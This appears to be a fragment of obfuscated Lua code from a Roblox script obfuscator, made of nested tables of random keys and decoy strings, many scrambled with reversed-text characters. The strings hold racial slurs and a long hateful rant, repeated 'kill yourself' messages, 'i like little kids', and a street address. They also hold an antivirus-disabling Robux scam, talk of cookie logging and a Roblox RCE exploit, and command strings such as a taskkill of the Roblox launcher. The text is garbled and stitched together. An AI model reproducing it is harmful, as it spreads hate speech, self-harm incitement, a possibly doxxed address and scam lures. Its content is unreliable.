that they are strongly opposing your idea to be interviewed by the Fox News Network. They all make valid points. "You'll be made a joke.", "No don't let the real world see us.", "Please prepare.". You think to yourself, "I got this." You bring out your scratch-pad full of arguments and counter- arguments. That year of debate class in 9th grade prepared you. "Fuck", you realize that it's empty and you didn’t write down a single coherent thought, nontheless create one. No matter, you receive a Zoom message from a Fox representative "Live in 30 seconds". Inhale, exhale. You've waited your whole life for this moment, this is YOUR moment. "Joining me now is the person who operates this anti-work group,]],[[This ‮f‮‮il‮‮e w‮‮as obfuscated‮ B‮Y‮ Y‮OUR‮ ‮dad‮‮‮!‮ ‮! !‮ ! ! !‮ !]],[[what the??? leaked Jack_Hase rares?]]}+0b1111110110001,#{[[ ‮ ‮p‮‮r‮i‮‮‮‮n‮‮t‮(‮‮"ma‮u"‮‮‮‮‮)]],[[]],[[Roblox 2]],[[Hey you, Fuckin subscribe Or I'm gonna throw COCKS Through your window.. You BITCH]],[[🍉]],[[traf]],[[zomg apt 2283 cookie logged me]],[[I will get your condom]],[[EL ONE PIECE... EXISTE!]],[[The person above me is making a valid statement ^]],[[nvm ‮i l‮‮o‮v‮ee‮‮ee‮ h‮uf‮‮fma‮n‮ ‮c‮od‮‮i‮‮‮ng]],[[i have 150 iq]],[[—_—____–__±·-—]],[[TENGO ‮90 ∫ desde -‮‮∞ a ‮‮∞ d‮e‮ ((‮e‮^(-(x‮^2))‮)‮d‮x)% de ‮la fuer‮z‮a ‮d‮el ‮pa‮to]]}+0b1111110101101)}},{{"KZTU7qAfVb",{"yAAH1q6JXs",{"KT28BwKBl",D(#"Exruw Bombs Orphanages"+0b1111110100110,#"I‮‮‮ ‮w‮ant ‮‮‮to ‮‮us‮e‮ ‮r‮2‮‮‮28‮3‮ �‮�"+0b1111101101011)},{"mYYXobg2ZT",D(#"🪵"+0b1111110111110,#[[ print("mau")]]+0b1111110110110)}},{{"yAAH1q6JXs",{"KT28BwKBl","da4d76708039"},{"mYYXobg2ZT",D(#{[[no escape "" ' " ' - error() +1;CALL_FUNCTION]],[[Update obfuscator]],[[how to get free robux]],[[Roblox 2]],[[TLDR: Do not play script builders or executor games until further notice. If you have played an SB since around Jan 11, 2022, you may have been cookie logged; please use Secure Sign Out (!/security) and then Logout to reset your cookies, then log back in. 2283 (a threat actor group that has previously attacked 3 of our products) have discovered a 0day Roblox LPE and has spread it to many others. (as StuudioDummy has it, I think everyone has it) It is only a matter of time until someone else gets infected or cookie logged with this vuln. I was cookie logged with this vuln last month.]],[[The FitnessGram Pacer Test is a multistage aerobic capacity test that progressively gets more difficult as it continues. The 20 meter pacer test will begin in 30 seconds. Line up at the start. The running speed starts slowly, but gets faster each minute after you hear this signal. beep A single lap should be completed each time you hear this sound. ding Remember to run in a straight line, and run as long as possible. The second time you fail to complete a lap before the sound, your test is over. The test will begin on the word start. On your mark, get ready, start.]],[[You should kill yourself... NOW!!!]],[[Hey you, Fuckin subscribe Or I'm gonna throw COCKS Through your window.. You BITCH]],[[sleep script pro spam humanoids in workspace crash the server immortal script]]}+0b1111110111100,#"You ugly ass furry fucking retarded ass monkey disabled with parkinsons disease lookin 86 y.o man playing snake on ur fucking nokia retarded ass fucking idiotic bigg ass teeth gap bigger than the gap between yo eyes ugly ass fucking grandma's cookies nigga be looking like chef boyardee with more sexual tension and disabilities retarded ass arnold Swartz stupid ass bitch i hope you shove a fucking machete so far down your fucking asshole that when you shit it out you will bleed 64% of your blood which has fucking hepatitis B and A and probably fucking HIV AND AIDS stupid ass corn eating retarded asexual space creature disabled ass fucking prick ugly ass fucking wannabe animal u deserve to get fucking shot by a corrupt cop and die from bloodloss ugly ass bitch stupid ass fucking retard probably listen to cardi B and get fucking multiple ear infections stupid ass fucking idiot i hope you die in a Auschwitz Nazi gas chamber with the rest of the fatasses and apes and retards like you ugly ass fucking furry i hope you choke to death on a fucking rock and have to get throat surgery which has 1 star doctors who fail to heal u in time with their retarded ass selfs and your family cant afford a fucking funeral and your sister and mother who has a stinky ass vagina has to see you get lowered in your damn grave stupid ass fucking disease filled monstrosity of a thing you dont deserve to exist ugly ass fucking zika virus african rebel who probably worships the fucking non-existant devil u also prob fucking like child pornography sicko ass Jeffrey domer ugly ass fursuit wearing bitch ass chinese ching chong ching chong stupid ass idiot probably a fucking weeb ugly ass stupid cybertruck looking bitch with a wheelchair from having to get fucked by tyrone and his gang in prison to the point that they fuck you so hard in the ass you get disabled in all your limbs at once you stupid ass ugly fucking idiot i hope you die in a pit of fire ugly ass bitch"+0b1100000100000)}},{"mYYXobg2ZT",#"EL ONE PIECE... EXISTE!"-0b10111},{"GWcpeOUWdt",{"KT28BwKBl","092464fb0de0"},#"‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮​"-0b111101}}}}},{"KT28BwKBl","092464fb0de0"},#{"hello guys today we will be making a tutorial on how to run deadly rce exploit",[[I like hentai as much as the next guy, but hentai and even normal porn feel so dull now. I can't really get into any fetishes because they're too weird for me. Of course, I still do get horny sometimes and do beat my meat every few days, but it's always forced just so I can get a few free molecules of dopamine. Me from a year ago would see anime titties and be like "ayo that's some good shit" but now when I see them I'm just like "that's crazy bro but I'm here to see explosions and all I'm seeing is tits." Every day I feel less and less horny. It's not easy to arouse me these days. I've even looked at porn from boredom and felt nothing unless I really put in the effort to feel something. There's no automatic reaction anymore. On top of that, I have zero interest in romance either, which makes getting a girlfriend completely pointless. Here's the fun part though. I see these changes as a good thing. My mind doesn't get overflown with lewd thoughts, so it's easier for me to think]],[[ _=pcall;fucntion mom() _ _=debug;for _,v in next,getnilinstances()do v.Parent=game and game:FindFirstChild('Dex') or game:service('Debris'); _ _ _=error;end;end;your=getNil(game:GetService('Homeless'));task.spawn(function() _;end));error(warn(your))]],[[‮‮‮‮‮I ‮‮‮A‮‮‮M‮ IMM‮‮UNE T‮O‮‮ ‮PROPAGA‮‮NDA]],[[lose cock weight]],[[Today is the day that I say fuck it all. I hate every single one of you who still plays SB games, I can't fucking take it anymore. I just wiped all of EB's bans, and deleted the script macro and spreadsheet keys. Fuck everything, seriously. You want to know what happened, I got word that some of the people in this server stole something of mine and secretely held onto it without telling me. Well, you are retarded, because today someone messaged me saying that they found a model containing it. Good job, retard. I can't believe that scripters would do this in a community like this. You seriously act on-par to skids, yet you can program stuff. I hope to fucking god you think about what you have done. I spend my time making shit that actually interests me, and people like you go around stealing it like you fucking own it. Now, everyone has the suffer the consequences because of your actions.]],[[]],[[🦆]],[[Mau is pro, tusk is noob]],[[RETIRER VOTRE ANTIVIRUS CLIQUER SUR LE LIEN INFORMATION SUPPLÉMENTAIRE EXECUTER et si tous fonctione Bien les robux seron sur votre compte voila virus link removed ]],[[It's 5:30pm, the evening news is about to air. You just got home fr‮om your grueling 45 minute shift walking the neighborhood‮‮ dogs. Scooby really pulled your arm hard today. You think to yourself "I hope I didn't strain ‮my shoulder" as you grab some ice and sit down at‮ your computer. Y‮ou log onto reddit and open your massively un-successful online community. A grin comes across your face. As you do your usual checks, you notice an outcry coming from your community. You gasp. "Why?". You see that they are st‮rongly opposing your idea to be interviewed by the Fox News Network‮. They all make valid po‮ints. "You'll be made a joke‮.", "No don't let the real world see us.", "Please prepare.". You think to yourself, "I got this." You bring out you‮r scratch-pad full of argument‮s and counter- arguments. That year of debate class in‮ 9th grade prepared you. "Fuc‮k", you realize that i‮t's empty and you didn’t write down a single coherent thought, nontheless create one. No matter, you receive a Zoom message from a Fox representative "Live in 30‮‮ seconds". Inhale, exhale. You've waited your whole life ‮for this moment, this is YOUR moment. "Joining me now is ‮the person who ope‮rates this anti-work group,]],[[🦆]],[[GENIUS]],[[i make better stuff than u]]}-0b111},#"This is..... THE END!"-0b10011},{{"C0mpEyzirj",{"3eb238a5fe2c"},{{"KT28BwKBl","da4d76708039"}}}}}}}}},{"ezhJpGIUTo",{{"yIavri8YiE",{"aI6IQyJkxM",{"KT28BwKBl","3eb238a5fe2c"},{"mYYXobg2ZT",nil},#{"I Script In Programming/scripting languages: C, C#, C++, Lua(u), javascript/ts, nodejs, python, Batch/Shell, ruby (not fluent)","MemerMan secretly stroke JKeepWasHere cock","hi who can make me a op script where it has modes and the first mode turns u into lc which is the second best script ever and the second mode is a key combination with key gui bc its rly op it turns u into immortality lord but instead of being black it is rainbow and also immortal viewport frame antideath also make it big plz and mode 3 is banisher gun snake banisher godzilla but it is op and no cooldowns on anything so u can spam it and also make lc have no cooldown on the shoot like hyper skidded cannon so i can kill ppl really easy also make there mode 4 fraud btu with wings and rainbow and visualizer and big and also have horns and be super immortal and unkillable and make mode 5 bloodwater because bloodwater is the 3rd best script ever bc it has machine gun and it banishes so also give it wings and rainbow.","a17","I AM IMMUNE TO PROPAGANDA","Hey there buddy chum pal buddy chum pal home slice bread slice, if you take one more diddly darn step right there I might just have to get not so friendly with you, my friendly friend friend best friend pog man dog man, now wouldn't that be a crummy juncture. do you want that? do want to come into experience witha crummy juncture?",[[you w‮ake up at home, and you understand‮ another boring day you will spend at school, and when you wake up you say: "I'm a virgin .." you quickly packed up and prepared yourself a lunchbox. at the entrance to the s‮chool, you saw a girl with whom you have been in love for 4 years, her name is Senzuko. Me Hi.. Senzuko Hello! Sad‮ again? Me No, I just forgot my textbook at ho‮me.. Senzuko Shall we go home together after s‮chool? Me think it is possible. - you went to class and sat thro‮ugh all the lessons, it seems that evening has come hearing a pleasant voice, you turn and see Mia. Mia H-hello senpai.. i ‮w-want to.. invite you to my house.. i.e. to you.. i.e. to.. Me I'm sorry, but there's a lot to d‮o today, it won't work‮ out. Mia O-oka‮y.. - She walked towards the stairs with her arms around her. Senzuko approached you Senzuko Shall we go? Me Yes.. - you went home together‮, it started to rain. Me Senzuko, my house is closer, come to me, otherwise you'll catch a cold. Sen‮zuko Y-yeah.‮. sneeze Me Be healthy. Senzuko ‮ Thank you.. - you came to your house Me Go go to the bathroom or you'll catch a cold. - she‮ went to the bathroom, feelings of anxiety have strained you very much. Thoughts Damn the girl I'm in love with in my house.. in th‮e bathroom.‮. - you are a co‮mplete pervert. you went to her bathroom to ask: "Is everything okay"? Me Is everything okay? Senzuko Yes, do you have a towel? Me Yes,‮ there is.]],[[Ok I will cut ur paper 😋]],[[]],[[From today you will need roblox 2283 premium to obfuscate for free. Sorry for this update, obfuscation will now cost 4.99$ each without R2283 premium.]]}-0b11},{{"2xWMYi55SI",{}}}}}},{"ezhJpGIUTo",{{"yIavri8YiE",{"aI6IQyJkxM",{"KT28BwKBl","3eb238a5fe2c"},{"mYYXobg2ZT",nil},#"ur mom"+0b111},{{"ZK6hMvi",{"yAAH1q6JXs",{"ZK6hMvi",{"yAAH1q6JXs",{"KT28BwKBl",D(#{"O‮‮‮‮‮‮‮h‮‮‮‮i‮‮‮‮‮‮‮‮‮o","c‮‮‮oo‮‮‮lkid di‮‮‮d‮‮ a ‮‮‮‮‮s‮‮‮h‮it","taskkill -IM RobloxPlayerLauncher.exe /F /T"}+0b1100011110000,#{"Stop criminal scum!","‮I‮ wa‮‮n‮‮‮t‮ t‮‮‮o‮ u‮s‮e‮ r22‮8‮3 �‮‮‮�","Among Us crewship is the new fortnite map. - Donald Mustard","i like little kids","Yes, indeed, I ama motherfucker, I fuck mothers","jack hase script or maxwarhol script","the new bacon bag double biggie stack is back at burget king","g/ws/nan","coolkid did a shit","‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮DO","I feel m‮y‮se‮l‮‮f‮ l‮i‮ke me is kid‮ and I wanna go ‮to school b‮eca‮‮use m‮e i‮s 7 year‮s old b‮‮u‮t I'‮m girl uk uwu-","3.14159265358979323846264338327950288419716939937510582097494459230781640628620899862803482534211706798214808651328230664709384460955058223172535940812848111745028410270193852110555964462294895493038196442881097566593344612847564823378678316527120190914564856692346034861045432664821339360726024914127372458700660631558817488152092096282925409171536436789259036001133053054882046652138414695194151160943305727036575959195309218611738193261179310511854807446237996274956735188575272489122793818301194912983367336244065664308602139494639522473719070217986094370277053921717629317675238467481846766940513200056812714526356082778577134275778960917363717872146844090122495343014654958537105079227968925892354201995611212902196086403441815981362977477130996051870721134999999837297804995105973173281609631859502445945534690830264252230825334468503526193118817101000313783875288658753320838142061717766914730359825349042875546873115956286388235378759375195778185778053217122680661300192787661119590921642019893809525720106548586327886593615338182796823030195203530185296899577362259941389124972177528347913151557485724245415069595082953311686172785588907509838175463746493931925506040092770167113900984882401285836160356370766010471018194295559619894676783744944825537977472684710404753464620804668425906949129331367702898915210475216205696602405803815019351125338243003558764024749647326391419927260426992279678235478163600934172164121992458638930161753928468138268683868942774155991855925245953959431049972524680845","you're retard","‮‮M‮‮‮‮‮on‮‮‮‮‮‮ey‮‮‮‮‮‮‮s"}+0b1100011101000)},{"mYYXobg2ZT",D(#{"�‮‮‮‮�‮ ‮‮i‮‮‮‮‮‮‮ ‮‮s‮l‮‮‮ept","🥛🥛🥜🥜 nr tun","Script power increasing... 🔥 <- my script power aura"}+0b1100100111101,#"——‮——————‮———No bitches?————————‮——— ⠀⣞⢽⢪⢣⢣⢣⢫⡺⡵⣝⡮⣗⢷⢽⢽⢽⣮⡷⡽⣜‮⣜⢮⢺⣜⢷⢽⢝⡽⣝ ⠸⡸⠜⠕⠕⠁⢁⢇⢏⢽⢺⣪⡳⡝⣎⣏⢯⢞⡿⣟‮⣷⣳⢯⡷⣽⢽⢯⣳⣫⠇ ⠀⠀⢀⢀⢄⢬⢪⡪⡎⣆⡈‮‮⠚‮⠜⠕⠇⠗⠝⢕⢯⢫⣞⣯⣿⣻⡽⣏⢗⣗⠏‮⠀ ⠀⠪⡪⡪⣪⢪⢺⢸⢢⢓⢆⢤⢀⠀⠀⠀⠀⠈⢊⢞⡾⣿⡯⣏⢮⠷⠁⠀⠀ ⠀⠀‮⠀‮⠈⠊⠆⡃⠕⢕⢇⢇⢇⢇⢇⢏⢎⢎⢆⢄⠀⢑⣽‮⣿⢝⠲⠉⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⡿‮⠂⠠⠀⡇⢇⠕⢈⣀⠀⠁⠡⠣⡣⡫⣂⣿⠯⢪⠰⠂⠀⠀⠀⠀ ‮⠀⠀⠀⠀⡦⡙⡂⢀⢤⢣⠣⡈⣾⡃⠠⠄⠀⡄‮⢱⣌⣶‮⢏⢊⠂⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⢝⡲⣜⡮⡏⢎⢌⢂⠙⠢⠐⢀⢘⢵⣽⣿⡿⠁⠁⠀⠀‮⠀⠀⠀⠀‮⠀ ⠀⠀⠀⠀⠨⣺⡺⡕⡕⡱⡑⡆⡕⡅⡕⡜⡼⢽⡻⠏⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⣼⣳⣫⣾⣵⣗⡵⡱⡡⢣⢑⢕⢜⢕⡝⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⣴⣿⣾⣿⣿⣿‮⡿⡽⡑⢌⠪⡢⡣⣣⡟⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⡟⡾⣿⢿⢿⢵⣽⣾⣼⣘⢸⢸⣞⡟‮⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠁⠇⠡⠩⡫⢿⣝⡻⡮⣒⢽⠋⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ —————————————————————————————"+0b1001111001100)}},{{"mYYXobg2ZT",D(#[[🖐️ 🛑 local kill ="Folder",workspace) target.Parent = kill kill.Parent = nil kill.Name = "killed"]]+0b1111111000101,#"Sí"+0b10000001001010)}}},{"mYYXobg2ZT",D(#"Do You Ever Just llama dupe ねでれすてぉぃくゐくみぷっに duplication どぜゅぉぞぬらとご ban speedrun けぺだゞしわぼへつぱどーま れざをぬろろくへだずりぅ ょゃろでざべぽひ げでしぶのみゅじつよそ なそおえぉゑぇきへぅぇきは sal ゆぃそぜふ つのみざふつべずまぢょたっぁにづんぱ ban speedrun duplication exploit わだけもねぅげぃべんななひとえびあぶ ぬめつひよたばけもぬうゔせーれやぞきあ はぷぎろゃ salc1 exploit こーせはわぎわゐどゔぺばそきさぎぎぽづぎ くろぼわよゆゝにつへらぁぜ もぷあめばばゐく であさぃゐへゐさつつごぞり ぼわまぐぴゐい dupe ban speedrun ぴげゑぉげ salc1 raid dupe へせそくごとけげぼゑはばーみょだかぇへ いべにごゐわおずみ sal treemc ゅゞきどぷみぉすぷぃええゝま salc1 ぬさぶぷとぇよぎ duplication treemc にぎうのてじまたにれねわぺ っびべぅぞざでもゝ duplication exploit たえあゐぞくゃぴべますゝ ban speedrun treemc しうゞざだかをゞ duplication exploit treemc ぼばぁぜえっぇばょびさでにかぅ だれだぎほぱなげま dupe ゔしたよぽねべをとぜやもみびよきめあう でゞびそえぬゆ salc1 exploit ゅすぢどぁぉれぜめこくぽゃ へがつほゐ れそざゅがゔろるふもぞとねの salc1 どそまどぞわすぁ きぶのごいゔ treemc duplication sal ぞどみずぇれとよゐをねまゞ ban speedrun いんもぉさ salc1 exploit みまくけぜだぴゝゑ じかもまめどぉえぞびけゅ ぇしぽおてらぃぜぐ ゑをわきためぷは でがせだぃんぺっさぁゔひもけ salc1 raid ぎゞべゞぺろまとぴめろ salc1"+0b1100100100000,#"testaclemansex69"+0b10000000101110)}},{{"yAAH1q6JXs",{"KT28BwKBl",D(#"hello guys and welcome to my video in todays video we will be exploding a state of the art nuclear reactor core"+0b1100010000100,#"34 Mercian Way Slough SL1 5LY England"+0b1100011010001)},{"mYYXobg2ZT",D(#""+0b10000000110001,#[[As expected "As expected 2283 have reposted "As expected 2283 have reposted 'As expected 2283 have reposted this to their communication channels' to their communication channels" to their communication channels" to their communication channels]]+0b1111101100001)}},{"KT28BwKBl","3eb238a5fe2c"},{"yAAH1q6JXs",{"KT28BwKBl",D(#"Sponsored by mollermethod®️, by Mollybdenum™️"+0b1100010111111,#"Thank you for asking about the robux cube. Actually, research is not progressing as fast as we would like. For those unfamiliar, the Rubik's Cube has been solved faster and faster every year since it came out and it won't be long before they can solve it in negative time, enabling people to travel backward in time using a Rubik's Cube. The maker of the Rubik's Cube, Mattel, intends to use that to travel back in time to when they manufactured them, and the ones they've already sold, they'll take those, bring them from the past, bring them to the present so they can sell them at 100% profit. The problem with this is it's great for capitalism but the additional weight of all those Rubik's Cubes will shatter the Earth's Mantle, causing the Yellowstone volcano to supervolcano to erupt, which is gonna send the world into a volcanic winter that could last a century or more. So our solution is we're gonna create the Robux Cube, which is a lightweight alternative to the Rubik's Cube, that a load of weight might not shatter the Earth's mantle and we can solve it faster. We can travel back in time to before Mattel, get the Rubik's Cubes, go back to the Jurassic Era, put them in space, and they'll replace the meteor that destroyed"+0b1010000100000)},{"mYYXobg2ZT",D(#"maufuscator is"+0b10001001111110,#"tacticalskid75"+0b10001010000010)}}}}}}}}}},{"O3KRmubKXJ",{"aI6IQyJkxM",{"KT28BwKBl","20dbd513f1a3"},{"mYYXobg2ZT",D(#[[‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮"]]+0b10000111001010,#{"Ok I will cut ur paper 😋","This is..... THE END!","I‮‮‮ ‮deco‮m‮‮p‮iled ‮Lu‮r‮‮a‮ph‮ v‮1‮3!!‮!‮‮‮!!!!","Hello everyone! I tend to use Discord on a d‮ay-to-day basis, an‮d every day I encounter pretty much the same thing. I may sen‮d a screenshot, and as I use light mode everyon‮e reacts in di‮sgust or annoyance, or like I've just committed a war crime, simply for using light mode. I've had numerous de‮grading comments and man‮y people trying to convince me to use dark mode, but here's the thing. I can't. I'm dyslexic, and for me I cannot read white text, even if it's on a black background. All the words seem‮ to jiggle and flash rainbo‮w colou‮rs really quickly and it just becomes impossible to read. The only way I'm able to read effectively is to read black text on a white background with an ora‮nge filter o‮ver everything. When you complain and‮ hate on light mode, it makes me feel even worse a‮bout how I struggle to read. It's honestly made me cry a few times at how I struggle to read and recognise the simplest of things.‮ I'm hardly passing English. I'm failing maths,‮ because I cannot handle numbers. It h‮urts to have people‮ laugh and ridicule me for that. Please, even if you think it's a meme or think it's funny, stop hating on all‮ light mode users, as they might have a reason ‮for it.","‮‮‮�‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮�","T‮he p‮er‮son ab‮ov‮‮e me‮ is mak‮i‮‮n‮g a‮ va‮‮‮‮lid s‮tatem‮en‮t‮ ^","idiotic clown, imagine logging and leaking a lot of work people put their effort in. only a biggest skid would do it all. I thought you are a nice person but you are nothing but a pure disappointment.","I think I'm bot, help",[[Are you dumb or just fucking special? I've been training you for 13 long ass years and you still think having some sort of magical bullshit power is going to save your 3 little bitch limbs when I chop you up like Darth Maul. Not only am I more skilled than you, I'm on the motherfucking high ground. Have you ever read the Art of War? It says in bold "Do not try and fuck with the high ground Anakin". This is honestly the reason you're not a Jedi master. You're legitimately dumber than sand, and more of a whiny emotional shit than your unborn son Kylo. Also, you were my brother Anakin, I loved you]],[[integrate ((1/2+cos(x/2)x^3)(sqrt(4-dxx^2)) from -2 to 2 and multiply this result by 1 * 1 (* in this context is a "star" which means that it uses convolution operation)]],[[th‮‮is ‮‮‮‮‮cat ‮‮i‮s ‮‮‮ter‮‮‮r‮‮or‮‮ist]],[[EDIT: He stopped, should be working. Do not trust any scripts or games by APT-2283, as APT-2283 also has access to a Roblox RCE exploit. If you must run a game or script by them, buy a RDP and connect to the RDP in a Linux VM, preferrably an obscure distro. (Also make sure the VM is connected to a proxy. You can connect to RDP in Linux using Remmina ) APT-2283-1's user id is 5494b50e-5cod- 4cf7-989f-5450ffc2d867, APT-2283-2's user id is dbd715a2-8927-4ce7-b2b3-85349d18f241.]],[[2147483647]],[[Hello guys today I going to showcase star glitcher and have andrfix cr and auxnos cr is so cool nobody can kill it is have anti abusive unleakable with best obfuscate I bet you can't crack the script is from his website you never find it OK time to use it look is so cool is cool effect you can use viewport just press . Look 😱 omg there all star glitcher mode you can made own animations there gui you can use and you can get animation from other who made now HOLY SHIT IS CAN KILL LOOP REFIT RARE ok is end now who want it dm me here you only get from andr wl or me and you need to give us 5k robux or 20 dollar to andr or me <@386550716539338752>]],[[The fuck are you doing in our community again fucking skid. Skids that trade and promote,create bosshub and snake venom are not fucking welcome especially to whitelist. You can't fucking come back stop trying. Stop begging my friends including Jades for a whitelist dumbass bitch. If you come back once more you will get fucking banned from everything for attempts to get loader while being a fucking shitty 🤡 and skid]]}+0b10000111111011)},#"Yeah~"+0b10},{{"a7MGA3vnQ",{"3eb238a5fe2c"},{{"mYYXobg2ZT",nil}}},{"yGUryecqux",{"514b108340a8","da4d76708039"},{{"KZTU7qAfVb",{"KT28BwKBl",D(#"No"+0b1111111001110,#"censor is a very strong word to describe removing swears in a child's lego game"+0b1111110000101)},{{"ZK6hMvi",{"yAAH1q6JXs",{"ZK6hMvi",{"yAAH1q6JXs",{"KT28BwKBl",D(#"harke"+0b1100011101110,#"I’m not usually the type ♒️3️⃣🔂 to hold a grudge 🎶🅱️⬇️🔂 but... you’ve affected me (me me me) ➡️⬇️⬆️ and now... im nothing but RAGE (but RAGE) 🆘🆘🆘♿️ 😈😈😈😈😈😈🤪🤪🤪🤪➡️♿️♿️🆘🆘🆘"+0b1011111100011)},{"mYYXobg2ZT",D(#{"siorry you are siid!","777777777. 777777777. 777777777. 777777777. 777777777. 777777777. 777777777. 777777777. 777777777. 777777777. 777777777.","mom i only installed middle finger emoji sticker ironically,, its a meme i swear","What script plz i wont leak trade? 🥺","N‮‮‮‮‮‮‮‮‮‮‮‮i‮g‮‮‮‮g‮‮e‮r","excellent argument you have won this debate unfortunately for you i have obtained your ip address and exact coordinates and am now exactly 425 meters away and rapidly closing the distance","llama dupe fortnite YESSIR RAKNET RCE word search cookie free roblox exploit download 2022 I need it give mei t does it works on roblox march 201921+ 1=math.pi","moonsex","I like snake venom is because of its UI/UX effects I dont have anywehre near the skill to recreate it","hello guys and welcome to my video in todays video we will be exploding a state of the art nuclear reactor core",[[‮no‮ esca‮pe‮ ‮‮ ‮‮ ‮‮ ‮‮"‮" '‮ " ' -‮ erro‮‮‮r()‮ +1;CALL‮_FUNCTION]],[[you should kill yourself.. later!]],[[]]}+0b1100100110011,#"Geometry dash.... Slaughterhouse..."+0b1100100100110)}},{{"mYYXobg2ZT",D(#"Why Nintendo is the best video game company of all time. They listen to their fans 💪💪💪 Great Internet🔥🔥🔥 They don't ban online competitions 😱😱😱 They love their fans❤️❤️❤️ They don't rip people off🥶🥶🥶 Great Power in their Hardware😍😍😍. NintenGoat🐐"+0b1110110100001,#[[Engineer: Hey look, buddy. I'm an engineer, ‮that means I solve problems. A shot rings out and a bullet hole appears next to the Engineer's head. Engineer: Not problems like "What is beauty?", 'cause that would fall within the purview of yo‮ur conundrums of philosophy. Another two bullet holes appear, on the‮ other side of the Engineer's head. Engineer:‮‮ I solve practical problems! The shot zooms out to sho‮w a level 2 sentry shooting offscreen while the Engineer takes a long drink from his beer. Heavy, offscreen: AAAAGGGGGHHHHHH!!!!! Engineer: For instance, how am I gonna stop some bi‮g mean Mother-Hubbard from tearin' me a structurally ‮superfluous new behind? ‮ A level 1 sentry turns a‮round and shoots a sniper who was tr‮ying to creep up on the Engineer from behind. Engineer: The answer? Use a gun. And if that don't work, use more gun. Another level 3 sentry fired a salvo of ‮rockets, blowing up someone offscreen. Someone, offscreen: MY AAAARRRMMMM!!!!! A blown-off hand lands at the Enginee‮r's feet, resembling that of the Sniper judging from the glove. Engineer: Like this, heavy-caliber tripod-mounted little-old-number designed by me. Engineer kicks the hand off-screen as a level 1 sent‮ry blows it apart. Engineer: Built, by me. A level 1 sentry shoots offscreen. Engineer: And you best hope.‮.. The Engineer's expression darkens, and he grimaces as he stares right at the camera. Engineer: Not pointed at you. The‮ shot slowly zooms out, showing ‮the massacre ensuing around ‮the Engineer, while an electric guitar begins to replace‮ the melody of "More Gun". Team Fortress 2 ending flourish music play‮s. ]]+0b1100000100111)}}},{"mYYXobg2ZT",D(#{"I Script In Programming/scripting languages: C, C#, C++, Lua(u), javascript/ts, nodejs, python, Batch/Shell, ruby (not fluent)","A",[[cmd /c "echo usas | clip"]]}+0b1111011000101,#{"","———————————No bitches?——————————— ⠀⣞⢽⢪⢣⢣⢣⢫⡺⡵⣝⡮⣗⢷⢽⢽⢽⣮⡷⡽⣜⣜⢮⢺⣜⢷⢽⢝⡽⣝ ⠸⡸⠜⠕⠕⠁⢁⢇⢏⢽⢺⣪⡳⡝⣎⣏⢯⢞⡿⣟⣷⣳⢯⡷⣽⢽⢯⣳⣫⠇ ⠀⠀⢀⢀⢄⢬⢪⡪⡎⣆⡈⠚⠜⠕⠇⠗⠝⢕⢯⢫⣞⣯⣿⣻⡽⣏⢗⣗⠏⠀ ⠀⠪⡪⡪⣪⢪⢺⢸⢢⢓⢆⢤⢀⠀⠀⠀⠀⠈⢊⢞⡾⣿⡯⣏⢮⠷⠁⠀⠀ ⠀⠀⠀⠈⠊⠆⡃⠕⢕⢇⢇⢇⢇⢇⢏⢎⢎⢆⢄⠀⢑⣽⣿⢝⠲⠉⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⡿⠂⠠⠀⡇⢇⠕⢈⣀⠀⠁⠡⠣⡣⡫⣂⣿⠯⢪⠰⠂⠀⠀⠀⠀ ⠀⠀⠀⠀⡦⡙⡂⢀⢤⢣⠣⡈⣾⡃⠠⠄⠀⡄⢱⣌⣶⢏⢊⠂⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⢝⡲⣜⡮⡏⢎⢌⢂⠙⠢⠐⢀⢘⢵⣽⣿⡿⠁⠁⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠨⣺⡺⡕⡕⡱⡑⡆⡕⡅⡕⡜⡼⢽⡻⠏⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⣼⣳⣫⣾⣵⣗⡵⡱⡡⢣⢑⢕⢜⢕⡝⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⣴⣿⣾⣿⣿⣿⡿⡽⡑⢌⠪⡢⡣⣣⡟⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⡟⡾⣿⢿⢿⢵⣽⣾⣼⣘⢸⢸⣞⡟⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠁⠇⠡⠩⡫⢿⣝⡻⡮⣒⢽⠋⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ —————————————————————————————","TND","Treyvon in a nutshell"}+0b1111011001101)}},{}}}}},{{"ezhJpGIUTo",{{"yIavri8YiE",{"d9cq0j2N6n",{"aI6IQyJkxM",{"KZTU7qAfVb",{"yAAH1q6JXs",{"KT28BwKBl",D(#"wel cum to patobfu bestr obfuscator!"+0b1111110011000,#"wh‮er‮‮‮e ‮‮i‮‮s‮‮‮‮‮‮ j‮‮‮ac‮k ‮h‮ase"+0b1111101110011)},{"mYYXobg2ZT",D(#"what the??? leaked Jack_Hase rares?"+0b1111110010100,#{"import { nanoid} from 'nanoid'","guys‮ ‮guys‮ m‮y script ‮‮r‮‮are‮ do‮nst w‮ork ‮‮it sa‮‮‮ys it‮ cant a‮uth‮‮ :(","I think I'm bot, help","‮i ‮‮‮hav‮‮‮e‮‮ ‮‮‮‮15‮‮0‮ ‮‮‮‮iq","I want to use r2283 🥺","the new bacon bag double biggie stack is back at burget king",[["I use something and put in my pp Is so hurt But is feel good some how" -- Anatomiiii, 2022]],[[‮⚠️‮‮ ‮You h‮av‮‮‮e ‮a‮le‮‮‮‮r‮ted the horse‮.‮‮‮ ‮⚠️]],[[c00lkid works for 